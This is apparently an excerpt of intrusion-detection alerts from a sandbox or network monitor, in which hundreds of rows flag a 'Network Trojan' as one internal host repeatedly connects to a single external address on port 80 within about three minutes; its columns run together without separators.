        2024-11-06T17:37:31.377319+010020391031A Network Trojan was detected192.168.11.2050006150.241.91.21880TCP
        2024-11-06T17:37:31.843031+010020391031A Network Trojan was detected192.168.11.2050007150.241.91.21880TCP
        2024-11-06T17:37:32.302768+010020391031A Network Trojan was detected192.168.11.2050008150.241.91.21880TCP
        2024-11-06T17:37:32.765303+010020391031A Network Trojan was detected192.168.11.2050009150.241.91.21880TCP
        2024-11-06T17:37:33.228218+010020391031A Network Trojan was detected192.168.11.2050010150.241.91.21880TCP
        2024-11-06T17:37:33.681576+010020391031A Network Trojan was detected192.168.11.2050011150.241.91.21880TCP
        2024-11-06T17:37:34.140667+010020391031A Network Trojan was detected192.168.11.2050012150.241.91.21880TCP
        2024-11-06T17:37:34.604366+010020391031A Network Trojan was detected192.168.11.2050013150.241.91.21880TCP
        2024-11-06T17:37:35.061625+010020391031A Network Trojan was detected192.168.11.2050014150.241.91.21880TCP
        2024-11-06T17:37:35.523961+010020391031A Network Trojan was detected192.168.11.2050015150.241.91.21880TCP
        2024-11-06T17:37:35.987072+010020391031A Network Trojan was detected192.168.11.2050016150.241.91.21880TCP
        2024-11-06T17:37:36.443737+010020391031A Network Trojan was detected192.168.11.2050017150.241.91.21880TCP
        2024-11-06T17:37:36.922739+010020391031A Network Trojan was detected192.168.11.2050018150.241.91.21880TCP
        2024-11-06T17:37:37.499281+010020391031A Network Trojan was detected192.168.11.2050019150.241.91.21880TCP
        2024-11-06T17:37:37.966229+010020391031A Network Trojan was detected192.168.11.2050020150.241.91.21880TCP
        2024-11-06T17:37:38.466949+010020391031A Network Trojan was detected192.168.11.2050021150.241.91.21880TCP
        2024-11-06T17:37:39.060786+010020391031A Network Trojan was detected192.168.11.2050022150.241.91.21880TCP
        2024-11-06T17:37:39.520618+010020391031A Network Trojan was detected192.168.11.2050023150.241.91.21880TCP
        2024-11-06T17:37:39.989926+010020391031A Network Trojan was detected192.168.11.2050024150.241.91.21880TCP
        2024-11-06T17:37:40.452214+010020391031A Network Trojan was detected192.168.11.2050025150.241.91.21880TCP
        2024-11-06T17:37:41.214467+010020391031A Network Trojan was detected192.168.11.2050026150.241.91.21880TCP
        2024-11-06T17:37:41.672356+010020391031A Network Trojan was detected192.168.11.2050027150.241.91.21880TCP
        2024-11-06T17:37:42.141122+010020391031A Network Trojan was detected192.168.11.2050028150.241.91.21880TCP
        2024-11-06T17:37:42.608834+010020391031A Network Trojan was detected192.168.11.2050029150.241.91.21880TCP
        2024-11-06T17:37:43.079815+010020391031A Network Trojan was detected192.168.11.2050030150.241.91.21880TCP
        2024-11-06T17:37:43.545075+010020391031A Network Trojan was detected192.168.11.2050031150.241.91.21880TCP
        2024-11-06T17:37:43.998645+010020391031A Network Trojan was detected192.168.11.2050032150.241.91.21880TCP
        2024-11-06T17:37:44.455988+010020391031A Network Trojan was detected192.168.11.2050033150.241.91.21880TCP
        2024-11-06T17:37:44.925400+010020391031A Network Trojan was detected192.168.11.2050034150.241.91.21880TCP
        2024-11-06T17:37:45.377949+010020391031A Network Trojan was detected192.168.11.2050035150.241.91.21880TCP
        2024-11-06T17:37:45.840762+010020391031A Network Trojan was detected192.168.11.2050036150.241.91.21880TCP
        2024-11-06T17:37:46.301507+010020391031A Network Trojan was detected192.168.11.2050037150.241.91.21880TCP
        2024-11-06T17:37:46.765064+010020391031A Network Trojan was detected192.168.11.2050038150.241.91.21880TCP
        2024-11-06T17:37:48.498848+010020391031A Network Trojan was detected192.168.11.2050039150.241.91.21880TCP
        2024-11-06T17:37:48.961898+010020391031A Network Trojan was detected192.168.11.2050040150.241.91.21880TCP
        2024-11-06T17:37:49.423063+010020391031A Network Trojan was detected192.168.11.2050041150.241.91.21880TCP
        2024-11-06T17:37:49.892429+010020391031A Network Trojan was detected192.168.11.2050042150.241.91.21880TCP
        2024-11-06T17:37:51.360986+010020391031A Network Trojan was detected192.168.11.2050043150.241.91.21880TCP
        2024-11-06T17:37:51.824899+010020391031A Network Trojan was detected192.168.11.2050044150.241.91.21880TCP
        2024-11-06T17:37:52.280591+010020391031A Network Trojan was detected192.168.11.2050045150.241.91.21880TCP
        2024-11-06T17:37:52.741799+010020391031A Network Trojan was detected192.168.11.2050046150.241.91.21880TCP
        2024-11-06T17:37:53.218040+010020391031A Network Trojan was detected192.168.11.2050047150.241.91.21880TCP
        2024-11-06T17:37:53.685513+010020391031A Network Trojan was detected192.168.11.2050048150.241.91.21880TCP
        2024-11-06T17:37:54.143668+010020391031A Network Trojan was detected192.168.11.2050049150.241.91.21880TCP
        2024-11-06T17:37:54.598990+010020391031A Network Trojan was detected192.168.11.2050050150.241.91.21880TCP
        2024-11-06T17:37:55.070873+010020391031A Network Trojan was detected192.168.11.2050051150.241.91.21880TCP
        2024-11-06T17:37:55.529455+010020391031A Network Trojan was detected192.168.11.2050052150.241.91.21880TCP
        2024-11-06T17:37:56.002186+010020391031A Network Trojan was detected192.168.11.2050053150.241.91.21880TCP
        2024-11-06T17:37:56.494271+010020391031A Network Trojan was detected192.168.11.2050054150.241.91.21880TCP
        2024-11-06T17:37:57.092256+010020391031A Network Trojan was detected192.168.11.2050055150.241.91.21880TCP
        2024-11-06T17:37:57.551555+010020391031A Network Trojan was detected192.168.11.2050056150.241.91.21880TCP
        2024-11-06T17:37:58.019420+010020391031A Network Trojan was detected192.168.11.2050057150.241.91.21880TCP
        2024-11-06T17:37:58.474943+010020391031A Network Trojan was detected192.168.11.2050058150.241.91.21880TCP
        2024-11-06T17:37:58.938386+010020391031A Network Trojan was detected192.168.11.2050059150.241.91.21880TCP
        2024-11-06T17:37:59.402070+010020391031A Network Trojan was detected192.168.11.2050060150.241.91.21880TCP
        2024-11-06T17:37:59.859358+010020391031A Network Trojan was detected192.168.11.2050061150.241.91.21880TCP
        2024-11-06T17:38:00.317794+010020391031A Network Trojan was detected192.168.11.2050062150.241.91.21880TCP
        2024-11-06T17:38:00.805858+010020391031A Network Trojan was detected192.168.11.2050063150.241.91.21880TCP
        2024-11-06T17:38:01.406216+010020391031A Network Trojan was detected192.168.11.2050064150.241.91.21880TCP
        2024-11-06T17:38:01.866127+010020391031A Network Trojan was detected192.168.11.2050065150.241.91.21880TCP
        2024-11-06T17:38:02.328508+010020391031A Network Trojan was detected192.168.11.2050066150.241.91.21880TCP
        2024-11-06T17:38:02.796514+010020391031A Network Trojan was detected192.168.11.2050067150.241.91.21880TCP
        2024-11-06T17:38:03.254806+010020391031A Network Trojan was detected192.168.11.2050068150.241.91.21880TCP
        2024-11-06T17:38:03.755460+010020391031A Network Trojan was detected192.168.11.2050069150.241.91.21880TCP
        2024-11-06T17:38:04.215238+010020391031A Network Trojan was detected192.168.11.2050070150.241.91.21880TCP
        2024-11-06T17:38:04.673345+010020391031A Network Trojan was detected192.168.11.2050071150.241.91.21880TCP
        2024-11-06T17:38:05.142947+010020391031A Network Trojan was detected192.168.11.2050072150.241.91.21880TCP
        2024-11-06T17:38:05.600564+010020391031A Network Trojan was detected192.168.11.2050073150.241.91.21880TCP
        2024-11-06T17:38:06.060646+010020391031A Network Trojan was detected192.168.11.2050074150.241.91.21880TCP
        2024-11-06T17:38:06.518787+010020391031A Network Trojan was detected192.168.11.2050075150.241.91.21880TCP
        2024-11-06T17:38:07.077501+010020391031A Network Trojan was detected192.168.11.2050076150.241.91.21880TCP
        2024-11-06T17:38:07.535158+010020391031A Network Trojan was detected192.168.11.2050077150.241.91.21880TCP
        2024-11-06T17:38:07.989708+010020391031A Network Trojan was detected192.168.11.2050078150.241.91.21880TCP
        2024-11-06T17:38:08.450536+010020391031A Network Trojan was detected192.168.11.2050079150.241.91.21880TCP
        2024-11-06T17:38:08.911512+010020391031A Network Trojan was detected192.168.11.2050080150.241.91.21880TCP
        2024-11-06T17:38:09.372049+010020391031A Network Trojan was detected192.168.11.2050081150.241.91.21880TCP
        2024-11-06T17:38:09.830228+010020391031A Network Trojan was detected192.168.11.2050082150.241.91.21880TCP
        2024-11-06T17:38:10.288180+010020391031A Network Trojan was detected192.168.11.2050083150.241.91.21880TCP
        2024-11-06T17:38:10.748336+010020391031A Network Trojan was detected192.168.11.2050084150.241.91.21880TCP
        2024-11-06T17:38:12.315645+010020391031A Network Trojan was detected192.168.11.2050085150.241.91.21880TCP
        2024-11-06T17:38:12.784616+010020391031A Network Trojan was detected192.168.11.2050086150.241.91.21880TCP
        2024-11-06T17:38:13.250261+010020391031A Network Trojan was detected192.168.11.2050087150.241.91.21880TCP
        2024-11-06T17:38:13.714730+010020391031A Network Trojan was detected192.168.11.2050088150.241.91.21880TCP
        2024-11-06T17:38:14.179305+010020391031A Network Trojan was detected192.168.11.2050089150.241.91.21880TCP
        2024-11-06T17:38:14.637487+010020391031A Network Trojan was detected192.168.11.2050090150.241.91.21880TCP
        2024-11-06T17:38:15.101133+010020391031A Network Trojan was detected192.168.11.2050091150.241.91.21880TCP
        2024-11-06T17:38:15.565922+010020391031A Network Trojan was detected192.168.11.2050092150.241.91.21880TCP
        2024-11-06T17:38:16.024019+010020391031A Network Trojan was detected192.168.11.2050093150.241.91.21880TCP
        2024-11-06T17:38:16.488483+010020391031A Network Trojan was detected192.168.11.2050094150.241.91.21880TCP
        2024-11-06T17:38:16.964814+010020391031A Network Trojan was detected192.168.11.2050095150.241.91.21880TCP
        2024-11-06T17:38:17.424957+010020391031A Network Trojan was detected192.168.11.2050096150.241.91.21880TCP
        2024-11-06T17:38:17.887674+010020391031A Network Trojan was detected192.168.11.2050097150.241.91.21880TCP
        2024-11-06T17:38:18.352311+010020391031A Network Trojan was detected192.168.11.2050098150.241.91.21880TCP
        2024-11-06T17:38:18.815634+010020391031A Network Trojan was detected192.168.11.2050099150.241.91.21880TCP
        2024-11-06T17:38:19.287639+010020391031A Network Trojan was detected192.168.11.2050100150.241.91.21880TCP
        2024-11-06T17:38:19.747691+010020391031A Network Trojan was detected192.168.11.2050101150.241.91.21880TCP
        2024-11-06T17:38:20.208181+010020391031A Network Trojan was detected192.168.11.2050102150.241.91.21880TCP
        2024-11-06T17:38:20.723512+010020391031A Network Trojan was detected192.168.11.2050103150.241.91.21880TCP
        2024-11-06T17:38:21.315086+010020391031A Network Trojan was detected192.168.11.2050104150.241.91.21880TCP
        2024-11-06T17:38:21.786420+010020391031A Network Trojan was detected192.168.11.2050105150.241.91.21880TCP
        2024-11-06T17:38:22.256212+010020391031A Network Trojan was detected192.168.11.2050106150.241.91.21880TCP
        2024-11-06T17:38:22.719714+010020391031A Network Trojan was detected192.168.11.2050107150.241.91.21880TCP
        2024-11-06T17:38:23.172480+010020391031A Network Trojan was detected192.168.11.2050108150.241.91.21880TCP
        2024-11-06T17:38:23.637363+010020391031A Network Trojan was detected192.168.11.2050109150.241.91.21880TCP
        2024-11-06T17:38:24.113842+010020391031A Network Trojan was detected192.168.11.2050110150.241.91.21880TCP
        2024-11-06T17:38:24.589661+010020391031A Network Trojan was detected192.168.11.2050111150.241.91.21880TCP
        2024-11-06T17:38:25.051539+010020391031A Network Trojan was detected192.168.11.2050112150.241.91.21880TCP
        2024-11-06T17:38:25.516094+010020391031A Network Trojan was detected192.168.11.2050113150.241.91.21880TCP
        2024-11-06T17:38:25.965818+010020391031A Network Trojan was detected192.168.11.2050114150.241.91.21880TCP
        2024-11-06T17:38:26.432270+010020391031A Network Trojan was detected192.168.11.2050115150.241.91.21880TCP
        2024-11-06T17:38:26.902188+010020391031A Network Trojan was detected192.168.11.2050116150.241.91.21880TCP
        2024-11-06T17:38:27.676357+010020391031A Network Trojan was detected192.168.11.2050117150.241.91.21880TCP
        2024-11-06T17:38:28.142085+010020391031A Network Trojan was detected192.168.11.2050118150.241.91.21880TCP
        2024-11-06T17:38:29.612306+010020391031A Network Trojan was detected192.168.11.2050119150.241.91.21880TCP
        2024-11-06T17:38:30.084610+010020391031A Network Trojan was detected192.168.11.2050120150.241.91.21880TCP
        2024-11-06T17:38:30.558696+010020391031A Network Trojan was detected192.168.11.2050121150.241.91.21880TCP
        2024-11-06T17:38:31.013926+010020391031A Network Trojan was detected192.168.11.2050122150.241.91.21880TCP
        2024-11-06T17:38:31.472682+010020391031A Network Trojan was detected192.168.11.2050123150.241.91.21880TCP
        2024-11-06T17:38:31.934023+010020391031A Network Trojan was detected192.168.11.2050124150.241.91.21880TCP
        2024-11-06T17:38:32.392889+010020391031A Network Trojan was detected192.168.11.2050125150.241.91.21880TCP
        2024-11-06T17:38:32.855735+010020391031A Network Trojan was detected192.168.11.2050126150.241.91.21880TCP
        2024-11-06T17:38:33.328101+010020391031A Network Trojan was detected192.168.11.2050127150.241.91.21880TCP
        2024-11-06T17:38:33.790188+010020391031A Network Trojan was detected192.168.11.2050128150.241.91.21880TCP
        2024-11-06T17:38:34.253976+010020391031A Network Trojan was detected192.168.11.2050129150.241.91.21880TCP
        2024-11-06T17:38:34.710335+010020391031A Network Trojan was detected192.168.11.2050130150.241.91.21880TCP
        2024-11-06T17:38:35.195594+010020391031A Network Trojan was detected192.168.11.2050131150.241.91.21880TCP
        2024-11-06T17:38:35.663662+010020391031A Network Trojan was detected192.168.11.2050132150.241.91.21880TCP
        2024-11-06T17:38:36.147569+010020391031A Network Trojan was detected192.168.11.2050133150.241.91.21880TCP
        2024-11-06T17:38:36.614792+010020391031A Network Trojan was detected192.168.11.2050134150.241.91.21880TCP
        2024-11-06T17:38:37.072269+010020391031A Network Trojan was detected192.168.11.2050135150.241.91.21880TCP
        2024-11-06T17:38:37.558295+010020391031A Network Trojan was detected192.168.11.2050136150.241.91.21880TCP
        2024-11-06T17:38:38.018760+010020391031A Network Trojan was detected192.168.11.2050137150.241.91.21880TCP
        2024-11-06T17:38:38.480086+010020391031A Network Trojan was detected192.168.11.2050138150.241.91.21880TCP
        2024-11-06T17:38:38.948307+010020391031A Network Trojan was detected192.168.11.2050139150.241.91.21880TCP
        2024-11-06T17:38:39.421953+010020391031A Network Trojan was detected192.168.11.2050140150.241.91.21880TCP
        2024-11-06T17:38:39.888571+010020391031A Network Trojan was detected192.168.11.2050141150.241.91.21880TCP
        2024-11-06T17:38:40.653465+010020391031A Network Trojan was detected192.168.11.2050142150.241.91.21880TCP
        2024-11-06T17:38:41.120641+010020391031A Network Trojan was detected192.168.11.2050143150.241.91.21880TCP
        2024-11-06T17:38:41.597300+010020391031A Network Trojan was detected192.168.11.2050144150.241.91.21880TCP
        2024-11-06T17:38:42.066497+010020391031A Network Trojan was detected192.168.11.2050145150.241.91.21880TCP
        2024-11-06T17:38:42.524723+010020391031A Network Trojan was detected192.168.11.2050146150.241.91.21880TCP
        2024-11-06T17:38:42.988519+010020391031A Network Trojan was detected192.168.11.2050147150.241.91.21880TCP
        2024-11-06T17:38:43.458666+010020391031A Network Trojan was detected192.168.11.2050148150.241.91.21880TCP
        2024-11-06T17:38:43.914194+010020391031A Network Trojan was detected192.168.11.2050149150.241.91.21880TCP
        2024-11-06T17:38:44.479160+010020391031A Network Trojan was detected192.168.11.2050150150.241.91.21880TCP
        2024-11-06T17:38:44.949452+010020391031A Network Trojan was detected192.168.11.2050151150.241.91.21880TCP
        2024-11-06T17:38:45.437257+010020391031A Network Trojan was detected192.168.11.2050152150.241.91.21880TCP
        2024-11-06T17:38:46.141027+010020391031A Network Trojan was detected192.168.11.2050153150.241.91.21880TCP
        2024-11-06T17:38:46.604240+010020391031A Network Trojan was detected192.168.11.2050154150.241.91.21880TCP
        2024-11-06T17:38:47.067875+010020391031A Network Trojan was detected192.168.11.2050155150.241.91.21880TCP
        2024-11-06T17:38:47.528561+010020391031A Network Trojan was detected192.168.11.2050156150.241.91.21880TCP
        2024-11-06T17:38:48.030264+010020391031A Network Trojan was detected192.168.11.2050157150.241.91.21880TCP
        2024-11-06T17:38:49.654981+010020391031A Network Trojan was detected192.168.11.2050158150.241.91.21880TCP
        2024-11-06T17:38:50.259509+010020391031A Network Trojan was detected192.168.11.2050159150.241.91.21880TCP
        2024-11-06T17:38:50.722429+010020391031A Network Trojan was detected192.168.11.2050160150.241.91.21880TCP
        2024-11-06T17:38:51.272625+010020391031A Network Trojan was detected192.168.11.2050161150.241.91.21880TCP
        2024-11-06T17:38:51.733150+010020391031A Network Trojan was detected192.168.11.2050162150.241.91.21880TCP
        2024-11-06T17:38:52.196506+010020391031A Network Trojan was detected192.168.11.2050163150.241.91.21880TCP
        2024-11-06T17:38:52.652714+010020391031A Network Trojan was detected192.168.11.2050164150.241.91.21880TCP
        2024-11-06T17:38:53.120754+010020391031A Network Trojan was detected192.168.11.2050165150.241.91.21880TCP
        2024-11-06T17:38:54.612978+010020391031A Network Trojan was detected192.168.11.2050166150.241.91.21880TCP
        2024-11-06T17:38:55.073922+010020391031A Network Trojan was detected192.168.11.2050167150.241.91.21880TCP
        2024-11-06T17:38:56.535315+010020391031A Network Trojan was detected192.168.11.2050168150.241.91.21880TCP
        2024-11-06T17:38:56.991205+010020391031A Network Trojan was detected192.168.11.2050169150.241.91.21880TCP
        2024-11-06T17:38:57.456679+010020391031A Network Trojan was detected192.168.11.2050170150.241.91.21880TCP
        2024-11-06T17:38:57.917390+010020391031A Network Trojan was detected192.168.11.2050171150.241.91.21880TCP
        2024-11-06T17:38:58.380759+010020391031A Network Trojan was detected192.168.11.2050172150.241.91.21880TCP
        2024-11-06T17:38:58.849996+010020391031A Network Trojan was detected192.168.11.2050173150.241.91.21880TCP
        2024-11-06T17:38:59.314575+010020391031A Network Trojan was detected192.168.11.2050174150.241.91.21880TCP
        2024-11-06T17:38:59.764725+010020391031A Network Trojan was detected192.168.11.2050175150.241.91.21880TCP
        2024-11-06T17:39:00.227871+010020391031A Network Trojan was detected192.168.11.2050176150.241.91.21880TCP
        2024-11-06T17:39:00.691450+010020391031A Network Trojan was detected192.168.11.2050177150.241.91.21880TCP
        2024-11-06T17:39:01.158455+010020391031A Network Trojan was detected192.168.11.2050178150.241.91.21880TCP
        2024-11-06T17:39:01.625618+010020391031A Network Trojan was detected192.168.11.2050179150.241.91.21880TCP
        2024-11-06T17:39:02.096982+010020391031A Network Trojan was detected192.168.11.2050180150.241.91.21880TCP
        2024-11-06T17:39:02.561732+010020391031A Network Trojan was detected192.168.11.2050181150.241.91.21880TCP
        2024-11-06T17:39:03.021871+010020391031A Network Trojan was detected192.168.11.2050182150.241.91.21880TCP
        2024-11-06T17:39:04.491391+010020391031A Network Trojan was detected192.168.11.2050183150.241.91.21880TCP
        2024-11-06T17:39:04.959581+010020391031A Network Trojan was detected192.168.11.2050184150.241.91.21880TCP
        2024-11-06T17:39:05.423113+010020391031A Network Trojan was detected192.168.11.2050185150.241.91.21880TCP
        2024-11-06T17:39:05.885414+010020391031A Network Trojan was detected192.168.11.2050186150.241.91.21880TCP
        2024-11-06T17:39:06.344742+010020391031A Network Trojan was detected192.168.11.2050187150.241.91.21880TCP
        2024-11-06T17:39:06.804250+010020391031A Network Trojan was detected192.168.11.2050188150.241.91.21880TCP
        2024-11-06T17:39:07.271139+010020391031A Network Trojan was detected192.168.11.2050189150.241.91.21880TCP
        2024-11-06T17:39:07.735404+010020391031A Network Trojan was detected192.168.11.2050190150.241.91.21880TCP
        2024-11-06T17:39:08.201792+010020391031A Network Trojan was detected192.168.11.2050191150.241.91.21880TCP
        2024-11-06T17:39:08.659377+010020391031A Network Trojan was detected192.168.11.2050192150.241.91.21880TCP
        2024-11-06T17:39:09.122621+010020391031A Network Trojan was detected192.168.11.2050193150.241.91.21880TCP
        2024-11-06T17:39:10.634952+010020391031A Network Trojan was detected192.168.11.2050194150.241.91.21880TCP
        2024-11-06T17:39:11.217821+010020391031A Network Trojan was detected192.168.11.2050195150.241.91.21880TCP
        2024-11-06T17:39:11.677541+010020391031A Network Trojan was detected192.168.11.2050196150.241.91.21880TCP
        2024-11-06T17:39:12.140441+010020391031A Network Trojan was detected192.168.11.2050197150.241.91.21880TCP
        2024-11-06T17:39:12.598583+010020391031A Network Trojan was detected192.168.11.2050198150.241.91.21880TCP
        2024-11-06T17:39:13.055826+010020391031A Network Trojan was detected192.168.11.2050199150.241.91.21880TCP
        2024-11-06T17:39:13.523033+010020391031A Network Trojan was detected192.168.11.2050200150.241.91.21880TCP
        2024-11-06T17:39:13.994542+010020391031A Network Trojan was detected192.168.11.2050201150.241.91.21880TCP
        2024-11-06T17:39:14.475108+010020391031A Network Trojan was detected192.168.11.2050202150.241.91.21880TCP
        2024-11-06T17:39:14.945196+010020391031A Network Trojan was detected192.168.11.2050203150.241.91.21880TCP
        2024-11-06T17:39:15.410096+010020391031A Network Trojan was detected192.168.11.2050204150.241.91.21880TCP
        2024-11-06T17:39:15.882606+010020391031A Network Trojan was detected192.168.11.2050205150.241.91.21880TCP
        2024-11-06T17:39:16.349385+010020391031A Network Trojan was detected192.168.11.2050206150.241.91.21880TCP
        2024-11-06T17:39:16.817407+010020391031A Network Trojan was detected192.168.11.2050207150.241.91.21880TCP
        2024-11-06T17:39:17.275379+010020391031A Network Trojan was detected192.168.11.2050208150.241.91.21880TCP
        2024-11-06T17:39:17.732677+010020391031A Network Trojan was detected192.168.11.2050209150.241.91.21880TCP
        2024-11-06T17:39:18.205331+010020391031A Network Trojan was detected192.168.11.2050210150.241.91.21880TCP
        2024-11-06T17:39:18.668582+010020391031A Network Trojan was detected192.168.11.2050211150.241.91.21880TCP
        2024-11-06T17:39:19.428266+010020391031A Network Trojan was detected192.168.11.2050212150.241.91.21880TCP
        2024-11-06T17:39:19.893836+010020391031A Network Trojan was detected192.168.11.2050213150.241.91.21880TCP
        2024-11-06T17:39:20.352857+010020391031A Network Trojan was detected192.168.11.2050214150.241.91.21880TCP
        2024-11-06T17:39:20.816235+010020391031A Network Trojan was detected192.168.11.2050215150.241.91.21880TCP
        2024-11-06T17:39:21.277889+010020391031A Network Trojan was detected192.168.11.2050216150.241.91.21880TCP
        2024-11-06T17:39:21.746225+010020391031A Network Trojan was detected192.168.11.2050217150.241.91.21880TCP
        2024-11-06T17:39:22.205991+010020391031A Network Trojan was detected192.168.11.2050218150.241.91.21880TCP
        2024-11-06T17:39:22.665021+010020391031A Network Trojan was detected192.168.11.2050219150.241.91.21880TCP
        2024-11-06T17:39:23.124825+010020391031A Network Trojan was detected192.168.11.2050220150.241.91.21880TCP
        2024-11-06T17:39:23.588693+010020391031A Network Trojan was detected192.168.11.2050221150.241.91.21880TCP
        2024-11-06T17:39:24.056437+010020391031A Network Trojan was detected192.168.11.2050222150.241.91.21880TCP
        2024-11-06T17:39:24.850732+010020391031A Network Trojan was detected192.168.11.2050223150.241.91.21880TCP
        2024-11-06T17:39:25.443101+010020391031A Network Trojan was detected192.168.11.2050224150.241.91.21880TCP
        2024-11-06T17:39:25.904820+010020391031A Network Trojan was detected192.168.11.2050225150.241.91.21880TCP
        2024-11-06T17:39:26.366762+010020391031A Network Trojan was detected192.168.11.2050226150.241.91.21880TCP
        2024-11-06T17:39:26.825073+010020391031A Network Trojan was detected192.168.11.2050227150.241.91.21880TCP
        2024-11-06T17:39:27.284197+010020391031A Network Trojan was detected192.168.11.2050228150.241.91.21880TCP
        2024-11-06T17:39:27.752140+010020391031A Network Trojan was detected192.168.11.2050229150.241.91.21880TCP
        2024-11-06T17:39:28.216975+010020391031A Network Trojan was detected192.168.11.2050230150.241.91.21880TCP
        2024-11-06T17:39:28.675634+010020391031A Network Trojan was detected192.168.11.2050231150.241.91.21880TCP
        2024-11-06T17:39:29.428978+010020391031A Network Trojan was detected192.168.11.2050232150.241.91.21880TCP
        2024-11-06T17:39:29.890011+010020391031A Network Trojan was detected192.168.11.2050233150.241.91.21880TCP
        2024-11-06T17:39:30.357042+010020391031A Network Trojan was detected192.168.11.2050234150.241.91.21880TCP
        2024-11-06T17:39:30.818426+010020391031A Network Trojan was detected192.168.11.2050235150.241.91.21880TCP
        2024-11-06T17:39:31.277313+010020391031A Network Trojan was detected192.168.11.2050236150.241.91.21880TCP
        2024-11-06T17:39:31.738953+010020391031A Network Trojan was detected192.168.11.2050237150.241.91.21880TCP
        2024-11-06T17:39:32.498880+010020391031A Network Trojan was detected192.168.11.2050238150.241.91.21880TCP
        2024-11-06T17:39:32.953757+010020391031A Network Trojan was detected192.168.11.2050239150.241.91.21880TCP
        2024-11-06T17:39:34.415650+010020391031A Network Trojan was detected192.168.11.2050240150.241.91.21880TCP
        2024-11-06T17:39:34.872641+010020391031A Network Trojan was detected192.168.11.2050241150.241.91.21880TCP
        2024-11-06T17:39:35.330220+010020391031A Network Trojan was detected192.168.11.2050242150.241.91.21880TCP
        2024-11-06T17:39:35.790020+010020391031A Network Trojan was detected192.168.11.2050243150.241.91.21880TCP
        2024-11-06T17:39:36.249141+010020391031A Network Trojan was detected192.168.11.2050244150.241.91.21880TCP
        2024-11-06T17:39:36.707749+010020391031A Network Trojan was detected192.168.11.2050245150.241.91.21880TCP
        2024-11-06T17:39:37.168002+010020391031A Network Trojan was detected192.168.11.2050246150.241.91.21880TCP
        2024-11-06T17:39:37.631401+010020391031A Network Trojan was detected192.168.11.2050247150.241.91.21880TCP
        2024-11-06T17:39:38.088540+010020391031A Network Trojan was detected192.168.11.2050248150.241.91.21880TCP
        2024-11-06T17:39:38.543035+010020391031A Network Trojan was detected192.168.11.2050249150.241.91.21880TCP
        2024-11-06T17:39:38.999006+010020391031A Network Trojan was detected192.168.11.2050250150.241.91.21880TCP
        2024-11-06T17:39:39.735061+010020391031A Network Trojan was detected192.168.11.2050251150.241.91.21880TCP
        2024-11-06T17:39:41.194453+010020391031A Network Trojan was detected192.168.11.2050252150.241.91.21880TCP
        2024-11-06T17:39:41.659637+010020391031A Network Trojan was detected192.168.11.2050253150.241.91.21880TCP
        2024-11-06T17:39:42.118753+010020391031A Network Trojan was detected192.168.11.2050254150.241.91.21880TCP
        2024-11-06T17:39:42.583156+010020391031A Network Trojan was detected192.168.11.2050255150.241.91.21880TCP
        2024-11-06T17:39:43.048937+010020391031A Network Trojan was detected192.168.11.2050256150.241.91.21880TCP
        2024-11-06T17:39:44.525904+010020391031A Network Trojan was detected192.168.11.2050257150.241.91.21880TCP
        2024-11-06T17:39:46.068974+010020391031A Network Trojan was detected192.168.11.2050258150.241.91.21880TCP
        2024-11-06T17:39:46.618213+010020391031A Network Trojan was detected192.168.11.2050259150.241.91.21880TCP
        2024-11-06T17:39:47.082527+010020391031A Network Trojan was detected192.168.11.2050260150.241.91.21880TCP
        2024-11-06T17:39:47.552422+010020391031A Network Trojan was detected192.168.11.2050261150.241.91.21880TCP
        2024-11-06T17:39:49.039114+010020391031A Network Trojan was detected192.168.11.2050262150.241.91.21880TCP
        2024-11-06T17:39:49.501698+010020391031A Network Trojan was detected192.168.11.2050263150.241.91.21880TCP
        2024-11-06T17:39:49.956694+010020391031A Network Trojan was detected192.168.11.2050264150.241.91.21880TCP
        2024-11-06T17:39:50.446400+010020391031A Network Trojan was detected192.168.11.2050265150.241.91.21880TCP
        2024-11-06T17:39:50.916598+010020391031A Network Trojan was detected192.168.11.2050266150.241.91.21880TCP
        2024-11-06T17:39:51.377505+010020391031A Network Trojan was detected192.168.11.2050267150.241.91.21880TCP
        2024-11-06T17:39:51.974941+010020391031A Network Trojan was detected192.168.11.2050268150.241.91.21880TCP
        2024-11-06T17:39:52.437142+010020391031A Network Trojan was detected192.168.11.2050269150.241.91.21880TCP
        2024-11-06T17:39:52.895660+010020391031A Network Trojan was detected192.168.11.2050270150.241.91.21880TCP
        2024-11-06T17:39:53.369054+010020391031A Network Trojan was detected192.168.11.2050271150.241.91.21880TCP
        2024-11-06T17:39:53.835749+010020391031A Network Trojan was detected192.168.11.2050272150.241.91.21880TCP
        2024-11-06T17:39:54.297548+010020391031A Network Trojan was detected192.168.11.2050273150.241.91.21880TCP
        2024-11-06T17:39:54.766558+010020391031A Network Trojan was detected192.168.11.2050274150.241.91.21880TCP
        2024-11-06T17:39:55.222699+010020391031A Network Trojan was detected192.168.11.2050275150.241.91.21880TCP
        2024-11-06T17:39:55.688489+010020391031A Network Trojan was detected192.168.11.2050276150.241.91.21880TCP
        2024-11-06T17:39:56.154931+010020391031A Network Trojan was detected192.168.11.2050277150.241.91.21880TCP
        2024-11-06T17:39:56.620095+010020391031A Network Trojan was detected192.168.11.2050278150.241.91.21880TCP
        2024-11-06T17:39:57.095149+010020391031A Network Trojan was detected192.168.11.2050279150.241.91.21880TCP
        2024-11-06T17:39:57.561935+010020391031A Network Trojan was detected192.168.11.2050280150.241.91.21880TCP
        2024-11-06T17:39:58.018971+010020391031A Network Trojan was detected192.168.11.2050281150.241.91.21880TCP
        2024-11-06T17:39:58.504699+010020391031A Network Trojan was detected192.168.11.2050282150.241.91.21880TCP
        2024-11-06T17:39:58.970171+010020391031A Network Trojan was detected192.168.11.2050283150.241.91.21880TCP
        2024-11-06T17:39:59.441025+010020391031A Network Trojan was detected192.168.11.2050284150.241.91.21880TCP
        2024-11-06T17:39:59.906365+010020391031A Network Trojan was detected192.168.11.2050285150.241.91.21880TCP
        2024-11-06T17:40:00.369509+010020391031A Network Trojan was detected192.168.11.2050286150.241.91.21880TCP
        2024-11-06T17:40:00.853421+010020391031A Network Trojan was detected192.168.11.2050287150.241.91.21880TCP
        2024-11-06T17:40:01.313154+010020391031A Network Trojan was detected192.168.11.2050288150.241.91.21880TCP
        2024-11-06T17:40:01.768737+010020391031A Network Trojan was detected192.168.11.2050289150.241.91.21880TCP
        2024-11-06T17:40:03.226599+010020391031A Network Trojan was detected192.168.11.2050290150.241.91.21880TCP
        2024-11-06T17:40:03.683311+010020391031A Network Trojan was detected192.168.11.2050291150.241.91.21880TCP
        2024-11-06T17:40:04.143650+010020391031A Network Trojan was detected192.168.11.2050292150.241.91.21880TCP
        2024-11-06T17:40:04.597354+010020391031A Network Trojan was detected192.168.11.2050293150.241.91.21880TCP
